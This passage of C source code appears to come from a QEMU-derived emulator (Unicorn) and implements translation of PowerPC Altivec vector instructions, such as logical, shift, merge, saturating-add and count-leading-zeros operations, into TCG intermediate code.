tcg_gen_mul_i64(tcg_ctx, t0, avr, ten); \ tcg_gen_add_i64(tcg_ctx, avr, t0, t2); \ set_avr64(tcg_ctx, rD(ctx->opcode), avr, true); \ } \ \ tcg_temp_free_i64(tcg_ctx, t0); \ tcg_temp_free_i64(tcg_ctx, t1); \ tcg_temp_free_i64(tcg_ctx, t2); \ tcg_temp_free_i64(tcg_ctx, avr); \ tcg_temp_free_i64(tcg_ctx, ten); \ tcg_temp_free_i64(tcg_ctx, z); \ } \ GEN_VX_VMUL10(vmul10uq, 0, 0); GEN_VX_VMUL10(vmul10euq, 1, 0); GEN_VX_VMUL10(vmul10cuq, 0, 1); GEN_VX_VMUL10(vmul10ecuq, 1, 1); #define GEN_VXFORM_V(name, vece, tcg_op, opc2, opc3) \ static void glue(gen_, name)(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ if (unlikely(!ctx->altivec_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VPU); \ return; \ } \ \ tcg_op(tcg_ctx, vece, \ avr_full_offset(rD(ctx->opcode)), \ avr_full_offset(rA(ctx->opcode)), \ avr_full_offset(rB(ctx->opcode)), \ 16, 16); \ } /* Logical operations */ GEN_VXFORM_V(vand, MO_64, tcg_gen_gvec_and, 2, 16); GEN_VXFORM_V(vandc, MO_64, tcg_gen_gvec_andc, 2, 17); GEN_VXFORM_V(vor, MO_64, tcg_gen_gvec_or, 2, 18); GEN_VXFORM_V(vxor, MO_64, tcg_gen_gvec_xor, 2, 19); GEN_VXFORM_V(vnor, MO_64, tcg_gen_gvec_nor, 2, 20); GEN_VXFORM_V(veqv, MO_64, tcg_gen_gvec_eqv, 2, 26); GEN_VXFORM_V(vnand, MO_64, tcg_gen_gvec_nand, 2, 22); GEN_VXFORM_V(vorc, MO_64, tcg_gen_gvec_orc, 2, 21); #define GEN_VXFORM(name, opc2, opc3) \ static void glue(gen_, name)(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_ptr ra, rb, rd; \ if (unlikely(!ctx->altivec_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VPU); \ return; \ } \ ra = gen_avr_ptr(tcg_ctx, rA(ctx->opcode)); \ rb = gen_avr_ptr(tcg_ctx, rB(ctx->opcode)); \ rd = gen_avr_ptr(tcg_ctx, rD(ctx->opcode)); \ gen_helper_##name(tcg_ctx, rd, ra, rb); \ tcg_temp_free_ptr(tcg_ctx, ra); \ tcg_temp_free_ptr(tcg_ctx, rb); \ tcg_temp_free_ptr(tcg_ctx, rd); \ } #define GEN_VXFORM_TRANS(name, opc2, opc3) \ static void glue(gen_, name)(DisasContext *ctx) \ { \ if (unlikely(!ctx->altivec_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VPU); \ return; \ } \ trans_##name(ctx); \ } #define GEN_VXFORM_ENV(name, opc2, opc3) \ static void glue(gen_, name)(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_ptr ra, rb, rd; \ if (unlikely(!ctx->altivec_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VPU); \ return; \ } \ ra = gen_avr_ptr(tcg_ctx, rA(ctx->opcode)); \ rb = gen_avr_ptr(tcg_ctx, rB(ctx->opcode)); \ rd = gen_avr_ptr(tcg_ctx, rD(ctx->opcode)); \ gen_helper_##name(tcg_ctx, tcg_ctx->cpu_env, rd, ra, rb); \ tcg_temp_free_ptr(tcg_ctx, ra); \ tcg_temp_free_ptr(tcg_ctx, rb); \ tcg_temp_free_ptr(tcg_ctx, rd); \ } #define GEN_VXFORM3(name, opc2, opc3) \ static void glue(gen_, name)(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_ptr ra, rb, rc, rd; \ if (unlikely(!ctx->altivec_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VPU); \ return; \ } \ ra = gen_avr_ptr(tcg_ctx, rA(ctx->opcode)); \ rb = gen_avr_ptr(tcg_ctx, rB(ctx->opcode)); \ rc = gen_avr_ptr(tcg_ctx, rC(ctx->opcode)); \ rd = gen_avr_ptr(tcg_ctx, rD(ctx->opcode)); \ gen_helper_##name(tcg_ctx, rd, ra, rb, rc); \ tcg_temp_free_ptr(tcg_ctx, ra); \ tcg_temp_free_ptr(tcg_ctx, rb); \ tcg_temp_free_ptr(tcg_ctx, rc); \ tcg_temp_free_ptr(tcg_ctx, rd); \ } /* * Support for Altivec instruction pairs that use bit 31 (Rc) as * an opcode bit. In general, these pairs come from different * versions of the ISA, so we must also support a pair of flags for * each instruction. */ #define GEN_VXFORM_DUAL(name0, flg0, flg2_0, name1, flg1, flg2_1) \ static void glue(gen_, name0##_##name1)(DisasContext *ctx) \ { \ if ((Rc(ctx->opcode) == 0) && \ ((ctx->insns_flags & flg0) || (ctx->insns_flags2 & flg2_0))) { \ gen_##name0(ctx); \ } else if ((Rc(ctx->opcode) == 1) && \ ((ctx->insns_flags & flg1) || (ctx->insns_flags2 & flg2_1))) { \ gen_##name1(ctx); \ } else { \ gen_inval_exception(ctx, POWERPC_EXCP_INVAL_INVAL); \ } \ } /* * We use this macro if one instruction is realized with direct * translation, and second one with helper. */ #define GEN_VXFORM_TRANS_DUAL(name0, flg0, flg2_0, name1, flg1, flg2_1)\ static void glue(gen_, name0##_##name1)(DisasContext *ctx) \ { \ if ((Rc(ctx->opcode) == 0) && \ ((ctx->insns_flags & flg0) || (ctx->insns_flags2 & flg2_0))) { \ if (unlikely(!ctx->altivec_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VPU); \ return; \ } \ trans_##name0(ctx); \ } else if ((Rc(ctx->opcode) == 1) && \ ((ctx->insns_flags & flg1) || (ctx->insns_flags2 & flg2_1))) { \ gen_##name1(ctx); \ } else { \ gen_inval_exception(ctx, POWERPC_EXCP_INVAL_INVAL); \ } \ } /* Adds support to provide invalid mask */ #define GEN_VXFORM_DUAL_EXT(name0, flg0, flg2_0, inval0, \ name1, flg1, flg2_1, inval1) \ static void glue(gen_, name0##_##name1)(DisasContext *ctx) \ { \ if ((Rc(ctx->opcode) == 0) && \ ((ctx->insns_flags & flg0) || (ctx->insns_flags2 & flg2_0)) && \ !(ctx->opcode & inval0)) { \ gen_##name0(ctx); \ } else if ((Rc(ctx->opcode) == 1) && \ ((ctx->insns_flags & flg1) || (ctx->insns_flags2 & flg2_1)) && \ !(ctx->opcode & inval1)) { \ gen_##name1(ctx); \ } else { \ gen_inval_exception(ctx, POWERPC_EXCP_INVAL_INVAL); \ } \ } #define GEN_VXFORM_HETRO(name, opc2, opc3) \ static void glue(gen_, name)(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_ptr rb; \ if (unlikely(!ctx->altivec_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VPU); \ return; \ } \ rb = gen_avr_ptr(tcg_ctx, rB(ctx->opcode)); \ gen_helper_##name(tcg_ctx, cpu_gpr[rD(ctx->opcode)], cpu_gpr[rA(ctx->opcode)], rb); \ tcg_temp_free_ptr(tcg_ctx, rb); \ } GEN_VXFORM_V(vaddubm, MO_8, tcg_gen_gvec_add, 0, 0); GEN_VXFORM_DUAL_EXT(vaddubm, PPC_ALTIVEC, PPC_NONE, 0, \ vmul10cuq, PPC_NONE, PPC2_ISA300, 0x0000F800) GEN_VXFORM_V(vadduhm, MO_16, tcg_gen_gvec_add, 0, 1); GEN_VXFORM_DUAL(vadduhm, PPC_ALTIVEC, PPC_NONE, \ vmul10ecuq, PPC_NONE, PPC2_ISA300) GEN_VXFORM_V(vadduwm, MO_32, tcg_gen_gvec_add, 0, 2); GEN_VXFORM_V(vaddudm, MO_64, tcg_gen_gvec_add, 0, 3); GEN_VXFORM_V(vsububm, MO_8, tcg_gen_gvec_sub, 0, 16); GEN_VXFORM_V(vsubuhm, MO_16, tcg_gen_gvec_sub, 0, 17); GEN_VXFORM_V(vsubuwm, MO_32, tcg_gen_gvec_sub, 0, 18); GEN_VXFORM_V(vsubudm, MO_64, tcg_gen_gvec_sub, 0, 19); GEN_VXFORM_V(vmaxub, MO_8, tcg_gen_gvec_umax, 1, 0); GEN_VXFORM_V(vmaxuh, MO_16, tcg_gen_gvec_umax, 1, 1); GEN_VXFORM_V(vmaxuw, MO_32, tcg_gen_gvec_umax, 1, 2); GEN_VXFORM_V(vmaxud, MO_64, tcg_gen_gvec_umax, 1, 3); GEN_VXFORM_V(vmaxsb, MO_8, tcg_gen_gvec_smax, 1, 4); GEN_VXFORM_V(vmaxsh, MO_16, tcg_gen_gvec_smax, 1, 5); GEN_VXFORM_V(vmaxsw, MO_32, tcg_gen_gvec_smax, 1, 6); GEN_VXFORM_V(vmaxsd, MO_64, tcg_gen_gvec_smax, 1, 7); GEN_VXFORM_V(vminub, MO_8, tcg_gen_gvec_umin, 1, 8); GEN_VXFORM_V(vminuh, MO_16, tcg_gen_gvec_umin, 1, 9); GEN_VXFORM_V(vminuw, MO_32, tcg_gen_gvec_umin, 1, 10); GEN_VXFORM_V(vminud, MO_64, tcg_gen_gvec_umin, 1, 11); GEN_VXFORM_V(vminsb, MO_8, tcg_gen_gvec_smin, 1, 12); GEN_VXFORM_V(vminsh, MO_16, tcg_gen_gvec_smin, 1, 13); GEN_VXFORM_V(vminsw, MO_32, tcg_gen_gvec_smin, 1, 14); GEN_VXFORM_V(vminsd, MO_64, tcg_gen_gvec_smin, 1, 15); GEN_VXFORM(vavgub, 1, 16); GEN_VXFORM(vabsdub, 1, 16); GEN_VXFORM_DUAL(vavgub, PPC_ALTIVEC, PPC_NONE, \ vabsdub, PPC_NONE, PPC2_ISA300) GEN_VXFORM(vavguh, 1, 17); GEN_VXFORM(vabsduh, 1, 17); GEN_VXFORM_DUAL(vavguh, PPC_ALTIVEC, PPC_NONE, \ vabsduh, PPC_NONE, PPC2_ISA300) GEN_VXFORM(vavguw, 1, 18); GEN_VXFORM(vabsduw, 1, 18); GEN_VXFORM_DUAL(vavguw, PPC_ALTIVEC, PPC_NONE, \ vabsduw, PPC_NONE, PPC2_ISA300) GEN_VXFORM(vavgsb, 1, 20); GEN_VXFORM(vavgsh, 1, 21); GEN_VXFORM(vavgsw, 1, 22); GEN_VXFORM(vmrghb, 6, 0); GEN_VXFORM(vmrghh, 6, 1); GEN_VXFORM(vmrghw, 6, 2); GEN_VXFORM(vmrglb, 6, 4); GEN_VXFORM(vmrglh, 6, 5); GEN_VXFORM(vmrglw, 6, 6); static void trans_vmrgew(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int VT = rD(ctx->opcode); int VA = rA(ctx->opcode); int VB = rB(ctx->opcode); TCGv_i64 tmp = tcg_temp_new_i64(tcg_ctx); TCGv_i64 avr = tcg_temp_new_i64(tcg_ctx); get_avr64(tcg_ctx, avr, VB, true); tcg_gen_shri_i64(tcg_ctx, tmp, avr, 32); get_avr64(tcg_ctx, avr, VA, true); tcg_gen_deposit_i64(tcg_ctx, avr, avr, tmp, 0, 32); set_avr64(tcg_ctx, VT, avr, true); get_avr64(tcg_ctx, avr, VB, false); tcg_gen_shri_i64(tcg_ctx, tmp, avr, 32); get_avr64(tcg_ctx, avr, VA, false); tcg_gen_deposit_i64(tcg_ctx, avr, avr, tmp, 0, 32); set_avr64(tcg_ctx, VT, avr, false); tcg_temp_free_i64(tcg_ctx, tmp); tcg_temp_free_i64(tcg_ctx, avr); } static void trans_vmrgow(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int VT = rD(ctx->opcode); int VA = rA(ctx->opcode); int VB = rB(ctx->opcode); TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 avr = tcg_temp_new_i64(tcg_ctx); get_avr64(tcg_ctx, t0, VB, true); get_avr64(tcg_ctx, t1, VA, true); tcg_gen_deposit_i64(tcg_ctx, avr, t0, t1, 32, 32); set_avr64(tcg_ctx, VT, avr, true); get_avr64(tcg_ctx, t0, VB, false); get_avr64(tcg_ctx, t1, VA, false); tcg_gen_deposit_i64(tcg_ctx, avr, t0, t1, 32, 32); set_avr64(tcg_ctx, VT, avr, false); tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); tcg_temp_free_i64(tcg_ctx, avr); } /* * lvsl VRT,RA,RB - Load Vector for Shift Left * * Let the EA be the sum (rA|0)+(rB). Let sh=EA[28-31]. * Let X be the 32-byte value 0x00 || 0x01 || 0x02 || ... || 0x1E || 0x1F. * Bytes sh:sh+15 of X are placed into vD. */ static void trans_lvsl(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int VT = rD(ctx->opcode); TCGv_i64 result = tcg_temp_new_i64(tcg_ctx); TCGv_i64 sh = tcg_temp_new_i64(tcg_ctx); TCGv EA = tcg_temp_new(tcg_ctx); /* Get sh(from description) by anding EA with 0xf. */ gen_addr_reg_index(ctx, EA); tcg_gen_extu_tl_i64(tcg_ctx, sh, EA); tcg_gen_andi_i64(tcg_ctx, sh, sh, 0xfULL); /* * Create bytes sh:sh+7 of X(from description) and place them in * higher doubleword of vD. */ tcg_gen_muli_i64(tcg_ctx, sh, sh, 0x0101010101010101ULL); tcg_gen_addi_i64(tcg_ctx, result, sh, 0x0001020304050607ull); set_avr64(tcg_ctx, VT, result, true); /* * Create bytes sh+8:sh+15 of X(from description) and place them in * lower doubleword of vD. */ tcg_gen_addi_i64(tcg_ctx, result, sh, 0x08090a0b0c0d0e0fULL); set_avr64(tcg_ctx, VT, result, false); tcg_temp_free_i64(tcg_ctx, result); tcg_temp_free_i64(tcg_ctx, sh); tcg_temp_free(tcg_ctx, EA); } /* * lvsr VRT,RA,RB - Load Vector for Shift Right * * Let the EA be the sum (rA|0)+(rB). Let sh=EA[28-31]. * Let X be the 32-byte value 0x00 || 0x01 || 0x02 || ... || 0x1E || 0x1F. * Bytes (16-sh):(31-sh) of X are placed into vD. */ static void trans_lvsr(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int VT = rD(ctx->opcode); TCGv_i64 result = tcg_temp_new_i64(tcg_ctx); TCGv_i64 sh = tcg_temp_new_i64(tcg_ctx); TCGv EA = tcg_temp_new(tcg_ctx); /* Get sh(from description) by anding EA with 0xf. */ gen_addr_reg_index(ctx, EA); tcg_gen_extu_tl_i64(tcg_ctx, sh, EA); tcg_gen_andi_i64(tcg_ctx, sh, sh, 0xfULL); /* * Create bytes (16-sh):(23-sh) of X(from description) and place them in * higher doubleword of vD. */ tcg_gen_muli_i64(tcg_ctx, sh, sh, 0x0101010101010101ULL); tcg_gen_subfi_i64(tcg_ctx, result, 0x1011121314151617ULL, sh); set_avr64(tcg_ctx, VT, result, true); /* * Create bytes (24-sh):(32-sh) of X(from description) and place them in * lower doubleword of vD. */ tcg_gen_subfi_i64(tcg_ctx, result, 0x18191a1b1c1d1e1fULL, sh); set_avr64(tcg_ctx, VT, result, false); tcg_temp_free_i64(tcg_ctx, result); tcg_temp_free_i64(tcg_ctx, sh); tcg_temp_free(tcg_ctx, EA); } /* * vsl VRT,VRA,VRB - Vector Shift Left * * Shifting left 128 bit value of vA by value specified in bits 125-127 of vB. * Lowest 3 bits in each byte element of register vB must be identical or * result is undefined. */ static void trans_vsl(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int VT = rD(ctx->opcode); int VA = rA(ctx->opcode); int VB = rB(ctx->opcode); TCGv_i64 avr = tcg_temp_new_i64(tcg_ctx); TCGv_i64 sh = tcg_temp_new_i64(tcg_ctx); TCGv_i64 carry = tcg_temp_new_i64(tcg_ctx); TCGv_i64 tmp = tcg_temp_new_i64(tcg_ctx); /* Place bits 125-127 of vB in 'sh'. */ get_avr64(tcg_ctx, avr, VB, false); tcg_gen_andi_i64(tcg_ctx, sh, avr, 0x07ULL); /* * Save highest 'sh' bits of lower doubleword element of vA in variable * 'carry' and perform shift on lower doubleword. */ get_avr64(tcg_ctx, avr, VA, false); tcg_gen_subfi_i64(tcg_ctx, tmp, 32, sh); tcg_gen_shri_i64(tcg_ctx, carry, avr, 32); tcg_gen_shr_i64(tcg_ctx, carry, carry, tmp); tcg_gen_shl_i64(tcg_ctx, avr, avr, sh); set_avr64(tcg_ctx, VT, avr, false); /* * Perform shift on higher doubleword element of vA and replace lowest * 'sh' bits with 'carry'. */ get_avr64(tcg_ctx, avr, VA, true); tcg_gen_shl_i64(tcg_ctx, avr, avr, sh); tcg_gen_or_i64(tcg_ctx, avr, avr, carry); set_avr64(tcg_ctx, VT, avr, true); tcg_temp_free_i64(tcg_ctx, avr); tcg_temp_free_i64(tcg_ctx, sh); tcg_temp_free_i64(tcg_ctx, carry); tcg_temp_free_i64(tcg_ctx, tmp); } /* * vsr VRT,VRA,VRB - Vector Shift Right * * Shifting right 128 bit value of vA by value specified in bits 125-127 of vB. * Lowest 3 bits in each byte element of register vB must be identical or * result is undefined. */ static void trans_vsr(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int VT = rD(ctx->opcode); int VA = rA(ctx->opcode); int VB = rB(ctx->opcode); TCGv_i64 avr = tcg_temp_new_i64(tcg_ctx); TCGv_i64 sh = tcg_temp_new_i64(tcg_ctx); TCGv_i64 carry = tcg_temp_new_i64(tcg_ctx); TCGv_i64 tmp = tcg_temp_new_i64(tcg_ctx); /* Place bits 125-127 of vB in 'sh'. */ get_avr64(tcg_ctx, avr, VB, false); tcg_gen_andi_i64(tcg_ctx, sh, avr, 0x07ULL); /* * Save lowest 'sh' bits of higher doubleword element of vA in variable * 'carry' and perform shift on higher doubleword. */ get_avr64(tcg_ctx, avr, VA, true); tcg_gen_subfi_i64(tcg_ctx, tmp, 32, sh); tcg_gen_shli_i64(tcg_ctx, carry, avr, 32); tcg_gen_shl_i64(tcg_ctx, carry, carry, tmp); tcg_gen_shr_i64(tcg_ctx, avr, avr, sh); set_avr64(tcg_ctx, VT, avr, true); /* * Perform shift on lower doubleword element of vA and replace highest * 'sh' bits with 'carry'. */ get_avr64(tcg_ctx, avr, VA, false); tcg_gen_shr_i64(tcg_ctx, avr, avr, sh); tcg_gen_or_i64(tcg_ctx, avr, avr, carry); set_avr64(tcg_ctx, VT, avr, false); tcg_temp_free_i64(tcg_ctx, avr); tcg_temp_free_i64(tcg_ctx, sh); tcg_temp_free_i64(tcg_ctx, carry); tcg_temp_free_i64(tcg_ctx, tmp); } /* * vgbbd VRT,VRB - Vector Gather Bits by Bytes by Doubleword * * All ith bits (i in range 1 to 8) of each byte of doubleword element in source * register are concatenated and placed into ith byte of appropriate doubleword * element in destination register. * * Following solution is done for both doubleword elements of source register * in parallel, in order to reduce the number of instructions needed(that's why * arrays are used): * First, both doubleword elements of source register vB are placed in * appropriate element of array avr. Bits are gathered in 2x8 iterations(2 for * loops). In first iteration bit 1 of byte 1, bit 2 of byte 2,... bit 8 of * byte 8 are in their final spots so avr[i], i={0,1} can be and-ed with * tcg_mask. For every following iteration, both avr[i] and tcg_mask variables * have to be shifted right for 7 and 8 places, respectively, in order to get * bit 1 of byte 2, bit 2 of byte 3.. bit 7 of byte 8 in their final spots so * shifted avr values(saved in tmp) can be and-ed with new value of tcg_mask... * After first 8 iteration(first loop), all the first bits are in their final * places, all second bits but second bit from eight byte are in their places... * only 1 eight bit from eight byte is in it's place). In second loop we do all * operations symmetrically, in order to get other half of bits in their final * spots. Results for first and second doubleword elements are saved in * result[0] and result[1] respectively. In the end those results are saved in * appropriate doubleword element of destination register vD. */ static void trans_vgbbd(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int VT = rD(ctx->opcode); int VB = rB(ctx->opcode); TCGv_i64 tmp = tcg_temp_new_i64(tcg_ctx); uint64_t mask = 0x8040201008040201ULL; int i, j; TCGv_i64 result[2]; result[0] = tcg_temp_new_i64(tcg_ctx); result[1] = tcg_temp_new_i64(tcg_ctx); TCGv_i64 avr[2]; avr[0] = tcg_temp_new_i64(tcg_ctx); avr[1] = tcg_temp_new_i64(tcg_ctx); TCGv_i64 tcg_mask = tcg_temp_new_i64(tcg_ctx); tcg_gen_movi_i64(tcg_ctx, tcg_mask, mask); for (j = 0; j < 2; j++) { get_avr64(tcg_ctx, avr[j], VB, j); tcg_gen_and_i64(tcg_ctx, result[j], avr[j], tcg_mask); } for (i = 1; i < 8; i++) { tcg_gen_movi_i64(tcg_ctx, tcg_mask, mask >> (i * 8)); for (j = 0; j < 2; j++) { tcg_gen_shri_i64(tcg_ctx, tmp, avr[j], i * 7); tcg_gen_and_i64(tcg_ctx, tmp, tmp, tcg_mask); tcg_gen_or_i64(tcg_ctx, result[j], result[j], tmp); } } for (i = 1; i < 8; i++) { tcg_gen_movi_i64(tcg_ctx, tcg_mask, mask << (i * 8)); for (j = 0; j < 2; j++) { tcg_gen_shli_i64(tcg_ctx, tmp, avr[j], i * 7); tcg_gen_and_i64(tcg_ctx, tmp, tmp, tcg_mask); tcg_gen_or_i64(tcg_ctx, result[j], result[j], tmp); } } for (j = 0; j < 2; j++) { set_avr64(tcg_ctx, VT, result[j], j); } tcg_temp_free_i64(tcg_ctx, tmp); tcg_temp_free_i64(tcg_ctx, tcg_mask); tcg_temp_free_i64(tcg_ctx, result[0]); tcg_temp_free_i64(tcg_ctx, result[1]); tcg_temp_free_i64(tcg_ctx, avr[0]); tcg_temp_free_i64(tcg_ctx, avr[1]); } /* * vclzw VRT,VRB - Vector Count Leading Zeros Word * * Counting the number of leading zero bits of each word element in source * register and placing result in appropriate word element of destination * register. */ static void trans_vclzw(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int VT = rD(ctx->opcode); int VB = rB(ctx->opcode); TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); int i; /* Perform count for every word element using tcg_gen_clzi_i32. */ for (i = 0; i < 4; i++) { tcg_gen_ld_i32(tcg_ctx, tmp, tcg_ctx->cpu_env, offsetof(CPUPPCState, vsr[32 + VB].u64[0]) + i * 4); tcg_gen_clzi_i32(tcg_ctx, tmp, tmp, 32); tcg_gen_st_i32(tcg_ctx, tmp, tcg_ctx->cpu_env, offsetof(CPUPPCState, vsr[32 + VT].u64[0]) + i * 4); } tcg_temp_free_i32(tcg_ctx, tmp); } /* * vclzd VRT,VRB - Vector Count Leading Zeros Doubleword * * Counting the number of leading zero bits of each doubleword element in source * register and placing result in appropriate doubleword element of destination * register. */ static void trans_vclzd(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int VT = rD(ctx->opcode); int VB = rB(ctx->opcode); TCGv_i64 avr = tcg_temp_new_i64(tcg_ctx); /* high doubleword */ get_avr64(tcg_ctx, avr, VB, true); tcg_gen_clzi_i64(tcg_ctx, avr, avr, 64); set_avr64(tcg_ctx, VT, avr, true); /* low doubleword */ get_avr64(tcg_ctx, avr, VB, false); tcg_gen_clzi_i64(tcg_ctx, avr, avr, 64); set_avr64(tcg_ctx, VT, avr, false); tcg_temp_free_i64(tcg_ctx, avr); } GEN_VXFORM(vmuloub, 4, 0); GEN_VXFORM(vmulouh, 4, 1); GEN_VXFORM(vmulouw, 4, 2); GEN_VXFORM(vmuluwm, 4, 2); GEN_VXFORM_DUAL(vmulouw, PPC_ALTIVEC, PPC_NONE, vmuluwm, PPC_NONE, PPC2_ALTIVEC_207) GEN_VXFORM(vmulosb, 4, 4); GEN_VXFORM(vmulosh, 4, 5); GEN_VXFORM(vmulosw, 4, 6); GEN_VXFORM(vmuleub, 4, 8); GEN_VXFORM(vmuleuh, 4, 9); GEN_VXFORM(vmuleuw, 4, 10); GEN_VXFORM(vmulesb, 4, 12); GEN_VXFORM(vmulesh, 4, 13); GEN_VXFORM(vmulesw, 4, 14); GEN_VXFORM_V(vslb, MO_8, tcg_gen_gvec_shlv, 2, 4); GEN_VXFORM_V(vslh, MO_16, tcg_gen_gvec_shlv, 2, 5); GEN_VXFORM_V(vslw, MO_32, tcg_gen_gvec_shlv, 2, 6); GEN_VXFORM(vrlwnm, 2, 6); GEN_VXFORM_DUAL(vslw, PPC_ALTIVEC, PPC_NONE, \ vrlwnm, PPC_NONE, PPC2_ISA300) GEN_VXFORM_V(vsld, MO_64, tcg_gen_gvec_shlv, 2, 23); GEN_VXFORM_V(vsrb, MO_8, tcg_gen_gvec_shrv, 2, 8); GEN_VXFORM_V(vsrh, MO_16, tcg_gen_gvec_shrv, 2, 9); GEN_VXFORM_V(vsrw, MO_32, tcg_gen_gvec_shrv, 2, 10); GEN_VXFORM_V(vsrd, MO_64, tcg_gen_gvec_shrv, 2, 27); GEN_VXFORM_V(vsrab, MO_8, tcg_gen_gvec_sarv, 2, 12); GEN_VXFORM_V(vsrah, MO_16, tcg_gen_gvec_sarv, 2, 13); GEN_VXFORM_V(vsraw, MO_32, tcg_gen_gvec_sarv, 2, 14); GEN_VXFORM_V(vsrad, MO_64, tcg_gen_gvec_sarv, 2, 15); GEN_VXFORM(vsrv, 2, 28); GEN_VXFORM(vslv, 2, 29); GEN_VXFORM(vslo, 6, 16); GEN_VXFORM(vsro, 6, 17); GEN_VXFORM(vaddcuw, 0, 6); GEN_VXFORM(vsubcuw, 0, 22); #define GEN_VXFORM_SAT(NAME, VECE, NORM, SAT, OPC2, OPC3) \ static void glue(glue(gen_, NAME), _vec)(TCGContext *tcg_ctx, unsigned vece, TCGv_vec t, \ TCGv_vec sat, TCGv_vec a, \ TCGv_vec b) \ { \ TCGv_vec x = tcg_temp_new_vec_matching(tcg_ctx, t); \ glue(glue(tcg_gen_, NORM), _vec)(tcg_ctx, VECE, x, a, b); \ glue(glue(tcg_gen_, SAT), _vec)(tcg_ctx, VECE, t, a, b); \ tcg_gen_cmp_vec(tcg_ctx, TCG_COND_NE, VECE, x, x, t); \ tcg_gen_or_vec(tcg_ctx, VECE, sat, sat, x); \ tcg_temp_free_vec(tcg_ctx, x); \ } \ static void glue(gen_, NAME)(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ static const TCGOpcode vecop_list[] = { \ glue(glue(INDEX_op_, NORM), _vec), \ glue(glue(INDEX_op_, SAT), _vec), \ INDEX_op_cmp_vec, 0 \ }; \ static const GVecGen4 g = { \ .fniv = glue(glue(gen_, NAME), _vec), \ .fno = glue(gen_helper_, NAME), \ .opt_opc = vecop_list, \ .write_aofs = true, \ .vece = VECE, \ }; \ if (unlikely(!ctx->altivec_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VPU); \ return; \ } \ tcg_gen_gvec_4(tcg_ctx, avr_full_offset(rD(ctx->opcode)), \ offsetof(CPUPPCState, vscr_sat), \ avr_full_offset(rA(ctx->opcode)), \ avr_full_offset(rB(ctx->opcode)), \ 16, 16, &g); \ } GEN_VXFORM_SAT(vaddubs, MO_8, add, usadd, 0, 8); GEN_VXFORM_DUAL_EXT(vaddubs, PPC_ALTIVEC, PPC_NONE, 0, \ vmul10uq, PPC_NONE, PPC2_ISA300, 0x0000F800) GEN_VXFORM_SAT(vadduhs, MO_16, add, usadd, 0, 9); GEN_VXFORM_DUAL(vadduhs, PPC_ALTIVEC, PPC_NONE, \ vmul10euq, PPC_NONE, PPC2_ISA300) GEN_VXFORM_SAT(vadduws, MO_32, add, usadd, 0, 10); GEN_VXFORM_SAT(vaddsbs, MO_8, add, ssadd, 0, 12); GEN_VXFORM_SAT(vaddshs, MO_16, add, ssadd, 0, 13); GEN_VXFORM_SAT(vaddsws, MO_32, add, ssadd, 0, 14); GEN_VXFORM_SAT(vsububs, MO_8, sub, ussub, 0, 24); GEN_VXFORM_SAT(vsubuhs, MO_16, sub, ussub, 0, 25); GEN_VXFORM_SAT(vsubuws, MO_32, sub, ussub, 0, 26); GEN_VXFORM_SAT(vsubsbs, MO_8, sub, sssub, 0, 28); GEN_VXFORM_SAT(vsubshs, MO_16, sub, sssub, 0, 29); GEN_VXFORM_SAT(vsubsws, MO_32, sub, sssub, 0, 30); GEN_VXFORM(vadduqm, 0, 4); GEN_VXFORM(vaddcuq, 0, 5); GEN_VXFORM3(vaddeuqm, 30, 0); GEN_VXFORM3(vaddecuq, 30, 0); GEN_VXFORM_DUAL(vaddeuqm, PPC_NONE, PPC2_ALTIVEC_207, \ vaddecuq, PPC_NONE, PPC2_ALTIVEC_207) GEN_VXFORM(vsubuqm, 0, 20); GEN_VXFORM(vsubcuq, 0, 21); GEN_VXFORM3(vsubeuqm, 31, 0); GEN_VXFORM3(vsubecuq, 31, 0); GEN_VXFORM_DUAL(vsubeuqm, PPC_NONE, PPC2_ALTIVEC_207, \ vsubecuq, PPC_NONE, PPC2_ALTIVEC_207) GEN_VXFORM(vrlb, 2, 0); GEN_VXFORM(vrlh, 2, 1); GEN_VXFORM(vrlw, 2, 2); GEN_VXFORM(vrlwmi, 2, 2); GEN_VXFORM_DUAL(vrlw, PPC_ALTIVEC, PPC_NONE, \ vrlwmi, PPC_NONE, PPC2_ISA300) GEN_VXFORM(vrld, 2, 3); GEN_VXFORM(vrldmi, 2, 3); GEN_VXFORM_DUAL(vrld, PPC_NONE, PPC2_ALTIVEC_207, \ vrldmi, PPC_NONE, PPC2_ISA300) GEN_VXFORM_TRANS(vsl, 2, 7); GEN_VXFORM(vrldnm, 2, 7); GEN_VXFORM_DUAL(vsl, PPC_ALTIVEC, PPC_NONE, \ vrldnm, PPC_NONE, PPC2_ISA300) GEN_VXFORM_TRANS(vsr, 2, 11); GEN_VXFORM_ENV(vpkuhum, 7, 0); GEN_VXFORM_ENV(vpkuwum, 7, 1); GEN_VXFORM_ENV(vpkudum, 7, 17); 